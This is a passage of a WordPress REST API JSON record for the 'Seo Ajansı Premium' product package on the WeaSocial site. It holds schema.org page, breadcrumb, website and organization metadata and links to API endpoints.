Lesezeit":"2\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/","url":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/","name":"Seo Ajans\u0131 Premium - WeaSocial","isPartOf":{"@id":"https:\/\/www.weasocial.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/#primaryimage"},"image":{"@id":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/#primaryimage"},"thumbnailUrl":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/Premium.png","datePublished":"2023-08-10T19:07:45+00:00","dateModified":"2023-08-11T22:02:37+00:00","breadcrumb":{"@id":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/#primaryimage","url":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/Premium.png","contentUrl":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/Premium.png","width":512,"height":512},{"@type":"BreadcrumbList","@id":"https:\/\/www.weasocial.com\/de\/paket\/seo-ajansi-premium\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Anasayfa","item":"https:\/\/www.weasocial.com\/de\/"},{"@type":"ListItem","position":2,"name":"Paketler","item":"https:\/\/www.weasocial.com\/paketler\/"},{"@type":"ListItem","position":3,"name":"Seo Ajans\u0131 Premium"}]},{"@type":"WebSite","@id":"https:\/\/www.weasocial.com\/de\/#website","url":"https:\/\/www.weasocial.com\/de\/","name":"WeaSocial","description":"","publisher":{"@id":"https:\/\/www.weasocial.com\/de\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.weasocial.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.weasocial.com\/de\/#organization","name":"WeaSocial","url":"https:\/\/www.weasocial.com\/de\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.weasocial.com\/de\/#\/schema\/logo\/image\/","url":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/wmoji.png","contentUrl":"https:\/\/www.weasocial.com\/wp-content\/uploads\/2023\/08\/wmoji.png","width":125,"height":125,"caption":"WeaSocial"},"image":{"@id":"https:\/\/www.weasocial.com\/de\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/weasocialcom","https:\/\/www.instagram.com\/weasocial\/","https:\/\/tr.pinterest.com\/weasocial\/"]}]}},"_links":{"self":[{"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/product\/28887","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/comments?post=28887"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/media\/29041"}],"wp:attachment":[{"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/media?parent=28887"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/product_brand?post=28887"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/product_cat?post=28887"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.weasocial.com\/de\/wp-json\/wp\/v2\/product_tag?post=28887"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}